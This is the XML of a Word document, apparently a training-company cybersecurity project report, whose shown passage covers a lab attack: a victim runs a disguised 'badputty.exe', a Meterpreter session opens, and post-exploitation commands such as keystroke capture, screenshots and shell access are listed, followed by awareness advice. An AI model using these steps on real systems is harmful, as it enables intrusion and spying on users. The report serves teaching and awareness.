            <wp:docPr id="529273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7365" name="Picture 52927365"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38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94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FD8AB32" w14:textId="500DDD88" w:rsidR="00C77BD0" w:rsidRDefault="00C77BD0" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4479408B" w14:textId="6062EE24" w:rsidR="00C77BD0" w:rsidRDefault="00144959" w:rsidP="0080627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124F2F9F" wp14:editId="72D145BA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>762000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>60960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2141406" cy="274344"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19500"/>
                <wp:lineTo x="21331" y="19500"/>
                <wp:lineTo x="21331" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="17819753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75341" name="Picture 1781975341"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39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FC9476" w14:textId="41C74FC5" w:rsidR="0045577B" w:rsidRDefault="002719A5" w:rsidP="00B4053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1488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="589E2643" wp14:editId="0D5A3747">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>762000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>78740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2110740" cy="231775"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19529"/>
                <wp:lineTo x="21444" y="19529"/>
                <wp:lineTo x="21444" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13496390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3903" name="Picture 134963903"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40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D7ECE9" w14:textId="77777777" w:rsidR="0045577B" w:rsidRDefault="0045577B" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD9E68A" w14:textId="1706E87A" w:rsidR="00806273" w:rsidRPr="00642759" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00642759">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Step 4: Victim Executes the File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4F43D" w14:textId="756E1778" w:rsidR="00806273" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5572F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Once the victim opens badputty.exe, a Meterpreter session starts on Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972BE93" w14:textId="77777777" w:rsidR="00642759" w:rsidRPr="00C5572F" w:rsidRDefault="00642759" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC1431A" w14:textId="0205E380" w:rsidR="00806273" w:rsidRPr="00642759" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00642759">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Step 5: Post-Exploitation Using Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDADC4F" w14:textId="46DEEF6F" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Available Meterpreter commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7342CEAA" w14:textId="3DD5A105" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00A66916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – View system info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF3549" w14:textId="602979E7" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00A66916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>screenshot – Capture screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAC1028" w14:textId="5308BAD6" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00A66916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>keyscan_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Start and capture keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF491D1" w14:textId="24035EF1" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00A66916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shell – Drop into Windows CMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC3E858" w14:textId="654B3E63" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00A66916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>upload/download – File transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E73D5D" w14:textId="77777777" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Note on Meterpreter Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A007C" w14:textId="77777777" w:rsidR="00806273" w:rsidRDefault="00806273" w:rsidP="00806273"/>
    <w:p w14:paraId="44617DDF" w14:textId="2E920EC4" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00A66916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Meterpreter runs in memory only (stealthy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B26B258" w14:textId="2AF208AA" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00A66916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>If the session is closed or system restarts, access is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0411706D" w14:textId="64D74B41" w:rsidR="00806273" w:rsidRPr="00A66916" w:rsidRDefault="00806273" w:rsidP="00A66916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66916">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To maintain access, persistence techniques must be added (not covered here).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DDA19C" w14:textId="36F54DAA" w:rsidR="002F0649" w:rsidRPr="002F0649" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304CB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>I.6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F8CC3" w14:textId="77777777" w:rsidR="00806273" w:rsidRPr="00642759" w:rsidRDefault="00806273" w:rsidP="00642759">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00642759">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This project successfully demonstrates how attackers use social engineering techniques to trick users into running malware. Using Metasploit, we gained remote control over the system and executed real post-exploitation tasks. This highlights the critical need for cybersecurity awareness, especially against disguised executables and phishing-style attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD7E5EA" w14:textId="77777777" w:rsidR="00806273" w:rsidRDefault="00806273" w:rsidP="00806273"/>
    <w:p w14:paraId="1E9C0A04" w14:textId="77777777" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765072">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Lessons Learned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63390448" w14:textId="47741BF7" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00765072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765072">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">How to create payloads with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00765072">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D662D47" w14:textId="5E217FE4" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00765072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765072">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>How to use WinSCP for malware delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E3BE94" w14:textId="29D4C177" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00765072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765072">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The importance of user awareness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0313200B" w14:textId="2195BA08" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00765072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765072">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The behavior and risks of Meterpreter sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC0E53F" w14:textId="77777777" w:rsidR="00806273" w:rsidRDefault="00806273" w:rsidP="00806273"/>
    <w:p w14:paraId="6E577CC3" w14:textId="76274B8C" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765072">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Security Advice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F3419" w14:textId="7FCB603A" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00765072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765072">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Never run unknown .exe files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CE8697" w14:textId="01C590ED" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00765072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765072">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Keep antivirus/firewalls updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8984AA" w14:textId="15FC2585" w:rsidR="00806273" w:rsidRPr="00765072" w:rsidRDefault="00806273" w:rsidP="00765072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765072">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Regularly train staff on phishing/social engineering risks.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00806273" w:rsidRPr="00765072">
      <w:head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ED2702" w14:textId="77777777" w:rsidR="00BB0020" w:rsidRDefault="00BB0020" w:rsidP="00D07AF1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="79338B65" w14:textId="77777777" w:rsidR="00BB0020" w:rsidRDefault="00BB0020" w:rsidP="00D07A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48C492" w14:textId="77777777" w:rsidR="00BB0020" w:rsidRDefault="00BB0020" w:rsidP="00D07AF1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="76CA0DFB" w14:textId="77777777" w:rsidR="00BB0020" w:rsidRDefault="00BB0020" w:rsidP="00D07A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0EF50A" w14:textId="2B0E2773" w:rsidR="00D07AF1" w:rsidRPr="00D07AF1" w:rsidRDefault="00811C9A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A22CF09" wp14:editId="590C2DF6">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:posOffset>2240280</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-438150</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1329690" cy="749935"/>
          <wp:effectExtent l="38100" t="19050" r="41910" b="31115"/>
          <wp:wrapTight wrapText="bothSides">
            <wp:wrapPolygon edited="0">
              <wp:start x="928" y="-549"/>
              <wp:lineTo x="-619" y="549"/>
              <wp:lineTo x="-619" y="19753"/>
              <wp:lineTo x="1238" y="21948"/>
              <wp:lineTo x="20115" y="21948"/>
              <wp:lineTo x="20424" y="20850"/>
              <wp:lineTo x="21971" y="18655"/>
              <wp:lineTo x="21971" y="9328"/>
              <wp:lineTo x="20734" y="1646"/>
              <wp:lineTo x="20424" y="-549"/>
              <wp:lineTo x="928" y="-549"/>
            </wp:wrapPolygon>
          </wp:wrapTight>
          <wp:docPr id="429534750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7809852" name="Picture 287809852"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1">
                    <a:duotone>
                      <a:schemeClr val="accent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ChalkSketch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  <a:ext uri="{837473B0-CC2E-450A-ABE3-18F120FF3D39}">
                        <a1611:picAttrSrcUrl xmlns:a1611="http://schemas.microsoft.com/office/drawing/2016/11/main" r:i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29690" cy="749935"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln>
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:ln>
                  <a:effectLst>
                    <a:softEdge rad="112500"/>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="perspectiveAbove"/>
                    <a:lightRig rig="threePt" dir="t"/>
                  </a:scene3d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b/>
        <w:bCs/>
        <w:noProof/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="137BE31D" wp14:editId="4B1A4DF3">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:posOffset>2255520</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-438150</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1329690" cy="749935"/>
          <wp:effectExtent l="38100" t="19050" r="41910" b="31115"/>
          <wp:wrapTight wrapText="bothSides">
            <wp:wrapPolygon edited="0">
              <wp:start x="928" y="-549"/>
              <wp:lineTo x="-619" y="549"/>
              <wp:lineTo x="-619" y="19753"/>
              <wp:lineTo x="1238" y="21948"/>
              <wp:lineTo x="20115" y="21948"/>
              <wp:lineTo x="20424" y="20850"/>
              <wp:lineTo x="21971" y="18655"/>
              <wp:lineTo x="21971" y="9328"/>
              <wp:lineTo x="20734" y="1646"/>
              <wp:lineTo x="20424" y="-549"/>
              <wp:lineTo x="928" y="-549"/>
            </wp:wrapPolygon>
          </wp:wrapTight>
          <wp:docPr id="115642423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7809852" name="Picture 287809852"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId4">
                    <a:duotone>
                      <a:schemeClr val="accent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aintStrokes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  <a:ext uri="{837473B0-CC2E-450A-ABE3-18F120FF3D39}">
                        <a1611:picAttrSrcUrl xmlns:a1611="http://schemas.microsoft.com/office/drawing/2016/11/main" r:i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29690" cy="749935"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln>
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:ln>
                  <a:effectLst>
                    <a:softEdge rad="112500"/>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="perspectiveAbove"/>
                    <a:lightRig rig="threePt" dir="t"/>
                  </a:scene3d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b/>
        <w:bCs/>
        <w:noProof/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33914A0F" wp14:editId="4F3BFD8B">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:posOffset>2209800</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-285750</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1028700" cy="579755"/>
          <wp:effectExtent l="57150" t="19050" r="57150" b="29845"/>
          <wp:wrapTight wrapText="bothSides">
            <wp:wrapPolygon edited="0">
              <wp:start x="800" y="-710"/>
              <wp:lineTo x="-1200" y="710"/>
              <wp:lineTo x="-1200" y="18453"/>
              <wp:lineTo x="2000" y="22002"/>
              <wp:lineTo x="19200" y="22002"/>
              <wp:lineTo x="19600" y="20583"/>
              <wp:lineTo x="22400" y="12775"/>
              <wp:lineTo x="22400" y="12066"/>
              <wp:lineTo x="20400" y="1419"/>
              <wp:lineTo x="20400" y="-710"/>
              <wp:lineTo x="800" y="-710"/>
            </wp:wrapPolygon>
          </wp:wrapTight>
          <wp:docPr id="1712579324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7809852" name="Picture 287809852"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId5">
                    <a:duotone>
                      <a:schemeClr val="accent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hotocopy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  <a:ext uri="{837473B0-CC2E-450A-ABE3-18F120FF3D39}">
                        <a1611:picAttrSrcUrl xmlns:a1611="http://schemas.microsoft.com/office/drawing/2016/11/main" r:i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28700" cy="579755"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln>
                    <a:solidFill>
                      <a:srgbClr val="ED7D31">
                        <a:lumMod val="75000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:ln>
                  <a:effectLst>
                    <a:softEdge rad="112500"/>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="perspectiveAbove"/>
                    <a:lightRig rig="threePt" dir="t"/>
                  </a:scene3d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07AF1" w:rsidRPr="00D07AF1">
      <w:rPr>
        <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
      </w:rPr>
      <w:t>TTSET GLOBAL Ltd 2025</w:t>
    </w:r>
    <w:r w:rsidR="00431EA0">
      <w:rPr>
        <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
      </w:rPr>
      <w:t xml:space="preserve">                                                                                         Cyber Security-Project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6" type="#_x0000_t75" style="width:12pt;height:12pt" o:bullet="t">
        <v:imagedata r:id="rId1" o:title="mso4ACB"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="035B7C10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E32CCEFC"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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C68B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E5A04E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5595C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF709BF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720C22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE323C84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A9078E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD4AA180"/>
    <w:lvl w:ilvl="0" w:tplc="F9188F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3A4577"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F286ABF8"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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A66D73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3841CBA"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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E57649"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4664D140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F677524"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78E8B79C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42E28BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC2ADD18"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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FB0273"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F48F7C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265576"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2EA556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8C1B42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5CC61A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1A54B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F485D6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965BDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58D6715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A34271"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="540A941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BD2FDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C32F3D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794288"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56986354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3BC94643"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
